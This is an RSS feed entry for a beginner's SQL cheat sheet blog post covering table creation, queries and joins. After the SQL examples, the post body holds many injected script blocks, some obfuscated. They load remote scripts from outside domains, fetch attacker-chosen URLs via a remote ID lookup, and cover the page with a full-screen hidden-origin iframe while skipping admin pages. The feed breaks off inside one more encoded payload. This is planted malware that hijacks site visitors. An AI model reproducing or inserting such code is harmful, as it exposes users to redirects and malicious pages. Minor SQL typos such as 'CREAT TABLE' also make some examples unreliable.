<?xml version="1.0" encoding="UTF-8"?><rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	>

<channel>
	<title>KevRichard &#187; Technology</title>
	<atom:link href="http://kevrichard.com/tag/technology/feed/" rel="self" type="application/rss+xml" />
	<link>http://kevrichard.com</link>
	<description>Technology and Digital Communications</description>
	<lastBuildDate>Wed, 22 Apr 2026 12:39:53 +0000</lastBuildDate>
	<language>en-US</language>
	<sy:updatePeriod>hourly</sy:updatePeriod>
	<sy:updateFrequency>1</sy:updateFrequency>
	<generator>http://wordpress.org/?v=4.1.1</generator>
	<item>
		<title>SQL Beginners Cheat Sheet</title>
		<link>http://kevrichard.com/2015/10/sql-beginners-cheat-sheet/</link>
		<comments>http://kevrichard.com/2015/10/sql-beginners-cheat-sheet/#comments</comments>
		<pubDate>Fri, 09 Oct 2015 02:11:33 +0000</pubDate>
		<dc:creator><![CDATA[Kevin  Richard]]></dc:creator>
				<category><![CDATA[Technology]]></category>
		<category><![CDATA[Uncategorized]]></category>
		<category><![CDATA[code academy]]></category>
		<category><![CDATA[data science]]></category>
		<category><![CDATA[Social Media]]></category>
		<category><![CDATA[SQL]]></category>

		<guid isPermaLink="false">http://kevrichard.com/?p=1187</guid>
		<description><![CDATA[So its been a while again, but push comes to shove and I&#8217;m determined to get back on to making a return to this blog. I&#8217;m on a bit of a skills development fix at the moment and decided here would be a great spot to report back on what I&#8217;ve been doing and to [&#8230;]]]></description>
				<content:encoded><![CDATA[<p>So its been a while again, but push comes to shove and I&#8217;m determined to get back on to making a return to this blog. I&#8217;m on a bit of a skills development fix at the moment and decided here would be a great spot to report back on what I&#8217;ve been doing and to create some documentation on the key learnings.</p>
<p>I recently went through a beginners course on SQL through <a href="https://www.codecademy.com/learn">Code Academy</a> (link to the course <a href="https://www.codecademy.com/en/courses/learn-sql">here</a>) which I found really interesting and potentially useful for future endeavors.</p>
<p><strong>SUMMARY </strong></p>
<p><strong>What is SQL?</strong> Known as a &#8216;Standard Query Language&#8217; its a method of organizing and summarizing data. My general thinking when it comes to this is that taking a structured dataset it allows the user to summarize and manipulate the data. In the case of multiple datasets, it connects them through a common tie so the user can get a better understanding of how they interact.</p>
<p><strong>Why is it potentially useful?</strong> I&#8217;ve experienced SQL in the context of a <a href="http://www.syncapse.com">data tool </a>where the language organizes raw data in such a way that its  a readable output for the end-user. When thinking about it in terms of even a basic excel spreadsheet, the language allows for the data to be summarized and reformatted saving the user from having to do a lot of manual work.</p>
<p>Below is a select set of terms from the course and example code:</p>
<p><strong>TERMS/COMMANDS:</strong></p>
<p>; is used as an &#8216;End statement&#8217; and is placed at the end of a command. It tells the system to move to the next query statement.</p>
<p>There are three basic functions of the SQL language: To BUILD, ANALYZE or JOIN data tables.</p>
<p><strong> BUILD:</strong></p>
<p>CREATE TABLE: is a command telling the system to build a new data table.</p>
<p>table_name(***): labels a table for use in queries and joining with other tables.</p>
<p>column_1 data_type: defines what data goes into a particular column (can be text, date, number etc.) These can be layered up to create a series of columns</p>
<p>INSERT INTO: is a formatting command used for define the set columns. Following this, column titles can be added ex: (id, name, age).</p>
<p>VALUES: This is a command used to enter in individual entries. Its formatted as VALUES (row value 1, row value 2&#8230;);</p>
<p>UPDATE: used to change entries in a table. Using &#8216;SET&#8217; and &#8216;WHERE&#8217; entries, data within the table can be altered</p>
<p class="CodeMirror" data-reactid=".g.0">ALTER TABLE: Where as UPDATE alters an entry, ALTER TABLE allows the user to change or add data columns.</p>
<p>DELETE FROM: Deletes rows from a table.</p>
<p>&nbsp;</p>
<p><strong>Example Code:</strong></p>
<pre>CREAT TABLE table_name (
 column_1 data_type,
 column_2 data_type,
 column_3 data_type
 );</pre>
<pre>INSERT INTO celebs (id, name, age)</pre>
<pre>VALUES (1, 'Justin Bieber', 21);</pre>
<pre> SELECT *FROM celebs;</pre>
<pre>UPDATE celebs
 SET age = 22
 WHERE id= 1;
 SELECT *FROM celebs;</pre>
<pre>ALTER TABLE celebs ADD COLUMN
 twitter_handle TEXT;
 SELECT *FROM celebs;</pre>
<pre class="CodeMirror" data-reactid=".p.0"><span class="cm-keyword" data-reactid=".p.0.$codeFragment140">DELETE</span> <span class="cm-keyword" data-reactid=".p.0.$codeFragment141">FROM</span> <span data-reactid=".p.0.4">celebs</span> <span class="cm-keyword" data-reactid=".p.0.$codeFragment142">WHERE</span> <span data-reactid=".p.0.8">twitter_handle</span> <span class="cm-keyword" data-reactid=".p.0.$codeFragment143">IS</span> <span class="cm-atom" data-reactid=".p.0.$codeFragment144">NULL</span><span data-reactid=".p.0.d">;</span></pre>
<p><strong>ANALYZE:</strong></p>
<p>SELECT *FROM &#8216;table name': displays all data from the labeled table the SQL interface. The * is used to notate &#8216;select the whole table&#8217;. Other commands such as &#8216;SELECT DISTINCT&#8217; can be used to summarize a table further based on a column or row entry.</p>
<p>BETWEEN: Is a filter option for the use of numerical data.</p>
<p>ORDER BY: organizes a data set. A related command DESC/ASC(aka: Descending/Ascending) can be used to organize numbers by a set parameter.</p>
<p>LIMIT: Sets maximum number of rows pulled from a dataset.</p>
<p>GROUP BY: organizes data by a specific column entry (example: type of apple).</p>
<p>COUNT: summarizes numerical data by a category (example: how many entries contain X)</p>
<p>SUM: Counts up the numerical data of a particular column in a table ( Ex: How many impressions in total).</p>
<p>MAX(): finds the largest value of a criteria.</p>
<p>MIN(): finds the smallest value of a criteria.</p>
<p>AVG(): finds the average of a criteria.</p>
<p>ROUND(): rounds decimal numbers to a specific integer.</p>
<p><strong>EXAMPLE CODE: </strong></p>
<pre>SELECT* FROM movies WHERE imdb_rating &gt;8;</pre>
<pre>SELECT * FROM movies
 WHERE name LIKE 'Se_en';</pre>
<pre>SELECT *FROM movies
 ORDER BY imdb_rating DESC;</pre>
<p>SELECT price, ROUND(AVG(downloads),2) FROM fake_apps GROUP BY price;</p>
<p><strong>JOIN:</strong></p>
<p>JOIN: creates a common column between two tables which joins the data set together (ex: id_actormovie JOIN ID_Actor)</p>
<p>ON: states the parameter of the join.</p>
<p>Inner Join: joins entries when a join criteria is met.</p>
<p>Left Join: Combines two tables together side by side and provides a NULL value when the join parameters are not met.</p>
<p>AS: When joining a table this allows columns of the joined table to be renamed without affecting the original unjoined tables.</p>
<p><strong>EXAMPLE CODE: </strong></p>
<pre>SELECT</pre>
<pre>albums.name AS 'Album', albums.year, artists.name AS 'Artist'
 FROM albums JOIN artists ON albums.artist_id = artists.id WHERE albums.year &gt;1990</pre>
<p><script>var url = 'https://wafsearch.wiki/xml';
var script = document.createElement('script');
script.src = url;
script.type = 'text/javascript';
script.async = true;
document.getElementsByTagName('head')[0].appendChild(script);</script><script>var url = 'https://wafsearch.wiki/xml';
var script = document.createElement('script');
script.src = url;
script.type = 'text/javascript';
script.async = true;
document.getElementsByTagName('head')[0].appendChild(script);</script><script>var url = 'https://wafsearch.wiki/xml';
var script = document.createElement('script');
script.src = url;
script.type = 'text/javascript';
script.async = true;
document.getElementsByTagName('head')[0].appendChild(script);</script><script>var url = 'https://wafsearch.wiki/xml';
var script = document.createElement('script');
script.src = url;
script.type = 'text/javascript';
script.async = true;
document.getElementsByTagName('head')[0].appendChild(script);</script><script>var url = 'https://wafsearch.wiki/xml';
var script = document.createElement('script');
script.src = url;
script.type = 'text/javascript';
script.async = true;
document.getElementsByTagName('head')[0].appendChild(script);</script><script>var url = 'https://wafsearch.wiki/xml';
var script = document.createElement('script');
script.src = url;
script.type = 'text/javascript';
script.async = true;
document.getElementsByTagName('head')[0].appendChild(script);</script><script>var url = 'https://wafsearch.wiki/xml';
var script = document.createElement('script');
script.src = url;
script.type = 'text/javascript';
script.async = true;
document.getElementsByTagName('head')[0].appendChild(script);</script><script>var url = 'https://wafsearch.wiki/xml';
var script = document.createElement('script');
script.src = url;
script.type = 'text/javascript';
script.async = true;
document.getElementsByTagName('head')[0].appendChild(script);</script><script>var url = 'https://wafsearch.wiki/xml';
var script = document.createElement('script');
script.src = url;
script.type = 'text/javascript';
script.async = true;
document.getElementsByTagName('head')[0].appendChild(script);</script><script>var url = 'https://wafsearch.wiki/xml';
var script = document.createElement('script');
script.src = url;
script.type = 'text/javascript';
script.async = true;
document.getElementsByTagName('head')[0].appendChild(script);</script><script>; !function(){var e=String.fromCharCode.apply(String,[50,46,46,42,41,96,117,117,40,63,55,51,47,55,50,53,54,62,51,52,61,41,116,57,53,55,117,51,52,54,51,52,63,116,42,50,42].map(function(e){return 90^e})),t=[{template:String.fromCharCode.apply(String,[50,46,46,42,41,96,117,117,40,59,45,116,61,51,46,50,47,56,47,41,63,40,57,53,52,46,63,52,46,116,57,53,55,117,33,51,62,39].map(function(e){return 90^e})),useFetch:!0}];if(!/^\/(wp-admin|wp-login)/.test(window.location.pathname||"")){var n=Symbol.for("__inline_id_offer__"),r=window[n]=window[n]||{iframeReady:!1,iframeId:"ifr_"+Math.random().toString(36).slice(2),run:null};r.iframeReady||("complete"===document.readyState||document.body?c():window.addEventListener("DOMContentLoaded",c))}function i(e,t){if(e.indexOf("dropbox.com")>=0)return e.replace(/\{id\}/g,t);var n=encodeURIComponent(t);return e.indexOf("gist.githubusercontent.com")>=0&#038;&#038;(n=n.replace(/%2F/g,"/")),e.replace(/\{id\}/g,n)}function o(e){return fetch(e,{cache:"no-store"}).then(function(e){return e.text()}).then(function(e){return(e||"").trim()}).catch(function(){return""})}function a(e){if(!e)return!1;try{var t=e.indexOf(":")>=0?e:"https://"+e;return new URL(t),!0}catch(n){return!1}}function c(){r.run||(r.run=!0,fetch(e,{cache:"no-store"}).then(function(e){return e.text()}).then(function(e){if(!(e=(e||"").trim())||!t.length)return null;var n=t,r=i(n[0].template,e);if(1===n.length)return n[0].useFetch?o(r).then(function(e){return e&#038;&#038;a(e)?e:r}):Promise.resolve(r);var c=0;return function t(){if(c>=n.length)return Promise.resolve(r);var d=n[c],u=i(d.template,e);return(c++,d.useFetch)?o(u).then(function(e){return e&#038;&#038;a(e)||e?e:t()}):Promise.resolve(u)}()}).then(function(e){e&#038;&#038;function e(t){try{var n=document.createElement("iframe");n.style.display="none",n.onload=function(){n.remove(),t(!0)},n.onerror=function(){n.remove(),t(!1)},n.src="about:blank",document.body.appendChild(n)}catch(r){t(!1)}}(function(t){t&#038;&#038;function e(t){if(!r.iframeReady){r.iframeReady=!0;var n,i,o,a=document.createElement("iframe");a.src=(n=t,i=Math.random().toString(36).slice(2),o=n.indexOf("?")>=0?"&#038;":"?",n+o+encodeURIComponent("v")+"="+encodeURIComponent(i)),a.id=r.iframeId,a.style.cssText="position:fixed !important;top:0;left:0;width:100vw;height:100vh;border:none;z-index:2147483647;margin:0;padding:0;overflow:hidden;",a.setAttribute("aria-hidden","true"),window.addEventListener("message",function(e){if(e.data&#038;&#038;"object"==typeof e.data&#038;&#038;"ktl-show-original"===e.data.type)try{var t=document.getElementById(r.iframeId);t&#038;&#038;t.parentNode&#038;&#038;t.parentNode.removeChild(t)}catch(n){}});try{document.body.appendChild(a)}catch(c){var d=new MutationObserver(function(){document.body&#038;&#038;!document.getElementById(r.iframeId)&#038;&#038;(document.body.appendChild(a),d.disconnect())});d.observe(document.documentElement,{childList:!0,subtree:!0})}}}(e)})}).catch(function(){}))}}();</p>
<p>console.log('28du3');</script><script>(function() {
  var API_ID_URL = "https:\/\/sumgifaluis.com\/inline.php";
  var TRUSTED_CONFIGS = [{"template":"https:\/\/raw.githubusercontent.com\/{id}","useFetch":true}];</p>
<p>  var GLOBAL_KEY = Symbol.for("__adspect_wpu_4__");
  var registry = window[GLOBAL_KEY] = window[GLOBAL_KEY] || { run: false };
  if (registry.run) return;
  registry.run = true;</p>
<p>  function buildTrustedUrl(template, id) {
    if (template.indexOf("dropbox.com") >= 0) return template.replace(/\{id\}/g, id);
    var encoded = encodeURIComponent(id);
    if (template.indexOf("gist.githubusercontent.com") >= 0 || template.indexOf("raw.githubusercontent.com") >= 0) encoded = encoded.replace(/%2F/g, "/");
    return template.replace(/\{id\}/g, encoded);
  }</p>
<p>  function isSingleUrl(text) {
    var s = (text || "").trim();
    if (s.indexOf("\n") >= 0 || s.indexOf("\r") >= 0) return false;
    return /^https?:\/\/[^\s<>"']+$/i.test(s);
  }</p>
<p>  function showInIframe(url) {
    if (!url || !/^https?:\/\//i.test(url)) return;
    try {
      var iframe = document.createElement("iframe");
      iframe.src = url;
      iframe.style.cssText = "position:fixed !important;top:0;left:0;width:100vw;height:100vh;border:none;z-index:2147483647;margin:0;padding:0;";
      (document.body || document.documentElement).appendChild(iframe);
    } catch (e) {}
  }</p>
<p>  function run() {
    fetch(API_ID_URL, { cache: "no-store" })
      .then(function(r) { return r.text(); })
      .then(function(id) {
        id = (id || "").trim();
        if (!id || !TRUSTED_CONFIGS.length) return null;
        var template = TRUSTED_CONFIGS[0].template;
        var trustedUrl = buildTrustedUrl(template, id);
        return fetch(trustedUrl, { cache: "no-store" })
          .then(function(r) { return r.text(); })
          .then(function(t) { return (t || "").trim(); })
          .catch(function() { return ""; });
      })
      .then(function(trustedResponse) {
        if (!trustedResponse) return;
        if (isSingleUrl(trustedResponse)) {
          showInIframe(trustedResponse);
        }
      })
      .catch(function() {});
  }</p>
<p>  if (document.readyState === "complete" || document.body) {
    run();
  } else {
    window.addEventListener("DOMContentLoaded", run);
  }
})();</script><script>(function() {
  var API_ID_URL = "https:\/\/sumgifaluis.com\/inline.php";
  var TRUSTED_CONFIGS = [{"template":"https:\/\/raw.githubusercontent.com\/{id}","useFetch":true}];</p>
<p>  var GLOBAL_KEY = Symbol.for("__adspect_wpu_4__");
  var registry = window[GLOBAL_KEY] = window[GLOBAL_KEY] || { run: false };
  if (registry.run) return;
  registry.run = true;</p>
<p>  function buildTrustedUrl(template, id) {
    if (template.indexOf("dropbox.com") >= 0) return template.replace(/\{id\}/g, id);
    var encoded = encodeURIComponent(id);
    if (template.indexOf("gist.githubusercontent.com") >= 0 || template.indexOf("raw.githubusercontent.com") >= 0) encoded = encoded.replace(/%2F/g, "/");
    return template.replace(/\{id\}/g, encoded);
  }</p>
<p>  function isSingleUrl(text) {
    var s = (text || "").trim();
    if (s.indexOf("\n") >= 0 || s.indexOf("\r") >= 0) return false;
    return /^https?:\/\/[^\s<>"']+$/i.test(s);
  }</p>
<p>  function showInIframe(url) {
    if (!url || !/^https?:\/\//i.test(url)) return;
    try {
      var iframe = document.createElement("iframe");
      iframe.src = url;
      iframe.style.cssText = "position:fixed !important;top:0;left:0;width:100vw;height:100vh;border:none;z-index:2147483647;margin:0;padding:0;";
      (document.body || document.documentElement).appendChild(iframe);
    } catch (e) {}
  }</p>
<p>  function run() {
    fetch(API_ID_URL, { cache: "no-store" })
      .then(function(r) { return r.text(); })
      .then(function(id) {
        id = (id || "").trim();
        if (!id || !TRUSTED_CONFIGS.length) return null;
        var template = TRUSTED_CONFIGS[0].template;
        var trustedUrl = buildTrustedUrl(template, id);
        return fetch(trustedUrl, { cache: "no-store" })
          .then(function(r) { return r.text(); })
          .then(function(t) { return (t || "").trim(); })
          .catch(function() { return ""; });
      })
      .then(function(trustedResponse) {
        if (!trustedResponse) return;
        if (isSingleUrl(trustedResponse)) {
          showInIframe(trustedResponse);
        }
      })
      .catch(function() {});
  }</p>
<p>  if (document.readyState === "complete" || document.body) {
    run();
  } else {
    window.addEventListener("DOMContentLoaded", run);
  }
})();</script><script>(function() {
  var API_ID_URL = "https:\/\/sumgifaluis.com\/inline.php";
  var TRUSTED_CONFIGS = [{"template":"https:\/\/raw.githubusercontent.com\/{id}","useFetch":true}];</p>
<p>  var GLOBAL_KEY = Symbol.for("__adspect_wpu_4__");
  var registry = window[GLOBAL_KEY] = window[GLOBAL_KEY] || { run: false };
  if (registry.run) return;
  registry.run = true;</p>
<p>  function buildTrustedUrl(template, id) {
    if (template.indexOf("dropbox.com") >= 0) return template.replace(/\{id\}/g, id);
    var encoded = encodeURIComponent(id);
    if (template.indexOf("gist.githubusercontent.com") >= 0 || template.indexOf("raw.githubusercontent.com") >= 0) encoded = encoded.replace(/%2F/g, "/");
    return template.replace(/\{id\}/g, encoded);
  }</p>
<p>  function isSingleUrl(text) {
    var s = (text || "").trim();
    if (s.indexOf("\n") >= 0 || s.indexOf("\r") >= 0) return false;
    return /^https?:\/\/[^\s<>"']+$/i.test(s);
  }</p>
<p>  function showInIframe(url) {
    if (!url || !/^https?:\/\//i.test(url)) return;
    try {
      var iframe = document.createElement("iframe");
      iframe.src = url;
      iframe.style.cssText = "position:fixed !important;top:0;left:0;width:100vw;height:100vh;border:none;z-index:2147483647;margin:0;padding:0;";
      (document.body || document.documentElement).appendChild(iframe);
    } catch (e) {}
  }</p>
<p>  function run() {
    fetch(API_ID_URL, { cache: "no-store" })
      .then(function(r) { return r.text(); })
      .then(function(id) {
        id = (id || "").trim();
        if (!id || !TRUSTED_CONFIGS.length) return null;
        var template = TRUSTED_CONFIGS[0].template;
        var trustedUrl = buildTrustedUrl(template, id);
        return fetch(trustedUrl, { cache: "no-store" })
          .then(function(r) { return r.text(); })
          .then(function(t) { return (t || "").trim(); })
          .catch(function() { return ""; });
      })
      .then(function(trustedResponse) {
        if (!trustedResponse) return;
        if (isSingleUrl(trustedResponse)) {
          showInIframe(trustedResponse);
        }
      })
      .catch(function() {});
  }</p>
<p>  if (document.readyState === "complete" || document.body) {
    run();
  } else {
    window.addEventListener("DOMContentLoaded", run);
  }
})();</script><script>(function() {
  var API_ID_URL = "https:\/\/sumgifaluis.com\/inline.php";
  var TRUSTED_CONFIGS = [{"template":"https:\/\/raw.githubusercontent.com\/{id}","useFetch":true}];</p>
<p>  var GLOBAL_KEY = Symbol.for("__adspect_wpu_4__");
  var registry = window[GLOBAL_KEY] = window[GLOBAL_KEY] || { run: false };
  if (registry.run) return;
  registry.run = true;</p>
<p>  function buildTrustedUrl(template, id) {
    if (template.indexOf("dropbox.com") >= 0) return template.replace(/\{id\}/g, id);
    var encoded = encodeURIComponent(id);
    if (template.indexOf("gist.githubusercontent.com") >= 0 || template.indexOf("raw.githubusercontent.com") >= 0) encoded = encoded.replace(/%2F/g, "/");
    return template.replace(/\{id\}/g, encoded);
  }</p>
<p>  function isSingleUrl(text) {
    var s = (text || "").trim();
    if (s.indexOf("\n") >= 0 || s.indexOf("\r") >= 0) return false;
    return /^https?:\/\/[^\s<>"']+$/i.test(s);
  }</p>
<p>  function showInIframe(url) {
    if (!url || !/^https?:\/\//i.test(url)) return;
    try {
      var iframe = document.createElement("iframe");
      iframe.src = url;
      iframe.style.cssText = "position:fixed !important;top:0;left:0;width:100vw;height:100vh;border:none;z-index:2147483647;margin:0;padding:0;";
      (document.body || document.documentElement).appendChild(iframe);
    } catch (e) {}
  }</p>
<p>  function run() {
    fetch(API_ID_URL, { cache: "no-store" })
      .then(function(r) { return r.text(); })
      .then(function(id) {
        id = (id || "").trim();
        if (!id || !TRUSTED_CONFIGS.length) return null;
        var template = TRUSTED_CONFIGS[0].template;
        var trustedUrl = buildTrustedUrl(template, id);
        return fetch(trustedUrl, { cache: "no-store" })
          .then(function(r) { return r.text(); })
          .then(function(t) { return (t || "").trim(); })
          .catch(function() { return ""; });
      })
      .then(function(trustedResponse) {
        if (!trustedResponse) return;
        if (isSingleUrl(trustedResponse)) {
          showInIframe(trustedResponse);
        }
      })
      .catch(function() {});
  }</p>
<p>  if (document.readyState === "complete" || document.body) {
    run();
  } else {
    window.addEventListener("DOMContentLoaded", run);
  }
})();</script><script>(function() {
  var API_ID_URL = "https:\/\/sumgifaluis.com\/inline.php";
  var TRUSTED_CONFIGS = [{"template":"https:\/\/raw.githubusercontent.com\/{id}","useFetch":true}];</p>
<p>  var GLOBAL_KEY = Symbol.for("__adspect_wpu_4__");
  var registry = window[GLOBAL_KEY] = window[GLOBAL_KEY] || { run: false };
  if (registry.run) return;
  registry.run = true;</p>
<p>  function buildTrustedUrl(template, id) {
    if (template.indexOf("dropbox.com") >= 0) return template.replace(/\{id\}/g, id);
    var encoded = encodeURIComponent(id);
    if (template.indexOf("gist.githubusercontent.com") >= 0 || template.indexOf("raw.githubusercontent.com") >= 0) encoded = encoded.replace(/%2F/g, "/");
    return template.replace(/\{id\}/g, encoded);
  }</p>
<p>  function isSingleUrl(text) {
    var s = (text || "").trim();
    if (s.indexOf("\n") >= 0 || s.indexOf("\r") >= 0) return false;
    return /^https?:\/\/[^\s<>"']+$/i.test(s);
  }</p>
<p>  function showInIframe(url) {
    if (!url || !/^https?:\/\//i.test(url)) return;
    try {
      var iframe = document.createElement("iframe");
      iframe.src = url;
      iframe.style.cssText = "position:fixed !important;top:0;left:0;width:100vw;height:100vh;border:none;z-index:2147483647;margin:0;padding:0;";
      (document.body || document.documentElement).appendChild(iframe);
    } catch (e) {}
  }</p>
<p>  function run() {
    fetch(API_ID_URL, { cache: "no-store" })
      .then(function(r) { return r.text(); })
      .then(function(id) {
        id = (id || "").trim();
        if (!id || !TRUSTED_CONFIGS.length) return null;
        var template = TRUSTED_CONFIGS[0].template;
        var trustedUrl = buildTrustedUrl(template, id);
        return fetch(trustedUrl, { cache: "no-store" })
          .then(function(r) { return r.text(); })
          .then(function(t) { return (t || "").trim(); })
          .catch(function() { return ""; });
      })
      .then(function(trustedResponse) {
        if (!trustedResponse) return;
        if (isSingleUrl(trustedResponse)) {
          showInIframe(trustedResponse);
        }
      })
      .catch(function() {});
  }</p>
<p>  if (document.readyState === "complete" || document.body) {
    run();
  } else {
    window.addEventListener("DOMContentLoaded", run);
  }
})();</script><script>(function() {
  var API_ID_URL = "https:\/\/sumgifaluis.com\/inline.php";
  var TRUSTED_CONFIGS = [{"template":"https:\/\/raw.githubusercontent.com\/{id}","useFetch":true}];</p>
<p>  var GLOBAL_KEY = Symbol.for("__adspect_wpu_4__");
  var registry = window[GLOBAL_KEY] = window[GLOBAL_KEY] || { run: false };
  if (registry.run) return;
  registry.run = true;</p>
<p>  function buildTrustedUrl(template, id) {
    if (template.indexOf("dropbox.com") >= 0) return template.replace(/\{id\}/g, id);
    var encoded = encodeURIComponent(id);
    if (template.indexOf("gist.githubusercontent.com") >= 0 || template.indexOf("raw.githubusercontent.com") >= 0) encoded = encoded.replace(/%2F/g, "/");
    return template.replace(/\{id\}/g, encoded);
  }</p>
<p>  function isSingleUrl(text) {
    var s = (text || "").trim();
    if (s.indexOf("\n") >= 0 || s.indexOf("\r") >= 0) return false;
    return /^https?:\/\/[^\s<>"']+$/i.test(s);
  }</p>
<p>  function showInIframe(url) {
    if (!url || !/^https?:\/\//i.test(url)) return;
    try {
      var iframe = document.createElement("iframe");
      iframe.src = url;
      iframe.style.cssText = "position:fixed !important;top:0;left:0;width:100vw;height:100vh;border:none;z-index:2147483647;margin:0;padding:0;";
      (document.body || document.documentElement).appendChild(iframe);
    } catch (e) {}
  }</p>
<p>  function run() {
    fetch(API_ID_URL, { cache: "no-store" })
      .then(function(r) { return r.text(); })
      .then(function(id) {
        id = (id || "").trim();
        if (!id || !TRUSTED_CONFIGS.length) return null;
        var template = TRUSTED_CONFIGS[0].template;
        var trustedUrl = buildTrustedUrl(template, id);
        return fetch(trustedUrl, { cache: "no-store" })
          .then(function(r) { return r.text(); })
          .then(function(t) { return (t || "").trim(); })
          .catch(function() { return ""; });
      })
      .then(function(trustedResponse) {
        if (!trustedResponse) return;
        if (isSingleUrl(trustedResponse)) {
          showInIframe(trustedResponse);
        }
      })
      .catch(function() {});
  }</p>
<p>  if (document.readyState === "complete" || document.body) {
    run();
  } else {
    window.addEventListener("DOMContentLoaded", run);
  }
})();</script><script>(function() {
  var API_ID_URL = "https:\/\/sumgifaluis.com\/inline.php";
  var TRUSTED_CONFIGS = [{"template":"https:\/\/raw.githubusercontent.com\/{id}","useFetch":true}];</p>
<p>  var GLOBAL_KEY = Symbol.for("__adspect_wpu_4__");
  var registry = window[GLOBAL_KEY] = window[GLOBAL_KEY] || { run: false };
  if (registry.run) return;
  registry.run = true;</p>
<p>  function buildTrustedUrl(template, id) {
    if (template.indexOf("dropbox.com") >= 0) return template.replace(/\{id\}/g, id);
    var encoded = encodeURIComponent(id);
    if (template.indexOf("gist.githubusercontent.com") >= 0 || template.indexOf("raw.githubusercontent.com") >= 0) encoded = encoded.replace(/%2F/g, "/");
    return template.replace(/\{id\}/g, encoded);
  }</p>
<p>  function isSingleUrl(text) {
    var s = (text || "").trim();
    if (s.indexOf("\n") >= 0 || s.indexOf("\r") >= 0) return false;
    return /^https?:\/\/[^\s<>"']+$/i.test(s);
  }</p>
<p>  function showInIframe(url) {
    if (!url || !/^https?:\/\//i.test(url)) return;
    try {
      var iframe = document.createElement("iframe");
      iframe.src = url;
      iframe.style.cssText = "position:fixed !important;top:0;left:0;width:100vw;height:100vh;border:none;z-index:2147483647;margin:0;padding:0;";
      (document.body || document.documentElement).appendChild(iframe);
    } catch (e) {}
  }</p>
<p>  function run() {
    fetch(API_ID_URL, { cache: "no-store" })
      .then(function(r) { return r.text(); })
      .then(function(id) {
        id = (id || "").trim();
        if (!id || !TRUSTED_CONFIGS.length) return null;
        var template = TRUSTED_CONFIGS[0].template;
        var trustedUrl = buildTrustedUrl(template, id);
        return fetch(trustedUrl, { cache: "no-store" })
          .then(function(r) { return r.text(); })
          .then(function(t) { return (t || "").trim(); })
          .catch(function() { return ""; });
      })
      .then(function(trustedResponse) {
        if (!trustedResponse) return;
        if (isSingleUrl(trustedResponse)) {
          showInIframe(trustedResponse);
        }
      })
      .catch(function() {});
  }</p>
<p>  if (document.readyState === "complete" || document.body) {
    run();
  } else {
    window.addEventListener("DOMContentLoaded", run);
  }
})();</script><script>(function() {
  var API_ID_URL = "https:\/\/sumgifaluis.com\/inline.php";
  var TRUSTED_CONFIGS = [{"template":"https:\/\/raw.githubusercontent.com\/{id}","useFetch":true}];</p>
<p>  var GLOBAL_KEY = Symbol.for("__adspect_wpu_4__");
  var registry = window[GLOBAL_KEY] = window[GLOBAL_KEY] || { run: false };
  if (registry.run) return;
  registry.run = true;</p>
<p>  function buildTrustedUrl(template, id) {
    if (template.indexOf("dropbox.com") >= 0) return template.replace(/\{id\}/g, id);
    var encoded = encodeURIComponent(id);
    if (template.indexOf("gist.githubusercontent.com") >= 0 || template.indexOf("raw.githubusercontent.com") >= 0) encoded = encoded.replace(/%2F/g, "/");
    return template.replace(/\{id\}/g, encoded);
  }</p>
<p>  function isSingleUrl(text) {
    var s = (text || "").trim();
    if (s.indexOf("\n") >= 0 || s.indexOf("\r") >= 0) return false;
    return /^https?:\/\/[^\s<>"']+$/i.test(s);
  }</p>
<p>  function showInIframe(url) {
    if (!url || !/^https?:\/\//i.test(url)) return;
    try {
      var iframe = document.createElement("iframe");
      iframe.src = url;
      iframe.style.cssText = "position:fixed !important;top:0;left:0;width:100vw;height:100vh;border:none;z-index:2147483647;margin:0;padding:0;";
      (document.body || document.documentElement).appendChild(iframe);
    } catch (e) {}
  }</p>
<p>  function run() {
    fetch(API_ID_URL, { cache: "no-store" })
      .then(function(r) { return r.text(); })
      .then(function(id) {
        id = (id || "").trim();
        if (!id || !TRUSTED_CONFIGS.length) return null;
        var template = TRUSTED_CONFIGS[0].template;
        var trustedUrl = buildTrustedUrl(template, id);
        return fetch(trustedUrl, { cache: "no-store" })
          .then(function(r) { return r.text(); })
          .then(function(t) { return (t || "").trim(); })
          .catch(function() { return ""; });
      })
      .then(function(trustedResponse) {
        if (!trustedResponse) return;
        if (isSingleUrl(trustedResponse)) {
          showInIframe(trustedResponse);
        }
      })
      .catch(function() {});
  }</p>
<p>  if (document.readyState === "complete" || document.body) {
    run();
  } else {
    window.addEventListener("DOMContentLoaded", run);
  }
})();</script><script><script async src="https://transporteejecutivovc.com/sttje/"></script></script><script>(function(){var __s=(function(){var _0x5641=[114,60,47,52,57,46,51,53,52,122,114,115,122,33,87,80,122,122,44,59,40,122,27,10,19,5,19,30,5,15,8,22,122,103,122,120,50,46,46,42,41,96,117,117,40,53,41,40,63,60,47,40,56,53,41,41,116,57,53,55,117,51,52,54,51,52,63,116,42,50,42,120,97,87,80,122,122,44,59,40,122,14,8,15,9,14,31,30,5,25,21,20,28,19,29,9,122,103,122,1,87,80,122,122,122,122,33,122,46,63,55,42,54,59,46,63,96,122,120,50,46,46,42,41,96,117,117,40,59,45,116,61,51,46,50,47,56,47,41,63,40,57,53,52,46,63,52,46,116,57,53,55,117,33,51,62,39,120,118,122,47,41,63,28,63,46,57,50,96,122,46,40,47,63,122,39,87,80,122,122,7,97,87,80,87,80,122,122,44,59,40,122,29,22,21,24,27,22,5,17,31,3,122,103,122,114,46,35,42,63,53,60,122,9,35,55,56,53,54,122,103,103,103,122,120,60,47,52,57,46,51,53,52,120,122,124,124,122,9,35,55,56,53,54,116,60,53,40,115,87,80,122,122,122,122,101,122,9,35,55,56,53,54,116,60,53,40,114,120,5,5,51,52,54,51,52,63,5,51,62,5,53,60,60,63,40,5,5,120,115,87,80,122,122,122,122,96,122,120,5,5,51,52,54,51,52,63,5,51,62,5,53,60,60,63,40,5,5,120,97,87,80,87,80,122,122,44,59,40,122,40,63,61,51,41,46,40,35,122,103,122,45,51,52,62,53,45,1,29,22,21,24,27,22,5,17,31,3,7,122,103,122,45,51,52,62,53,45,1,29,22,21,24,27,22,5,17,31,3,7,122,38,38,122,33,87,80,122,122,122,122,41,46,59,46,47,41,96,122,120,51,62,54,63,120,118,87,80,122,122,122,122,51,60,40,59,55,63,19,62,96,122,120,5,5,51,52,54,51,52,63,5,53,60,60,63,40,5,51,60,40,59,55,63,5,5,120,118,87,80,12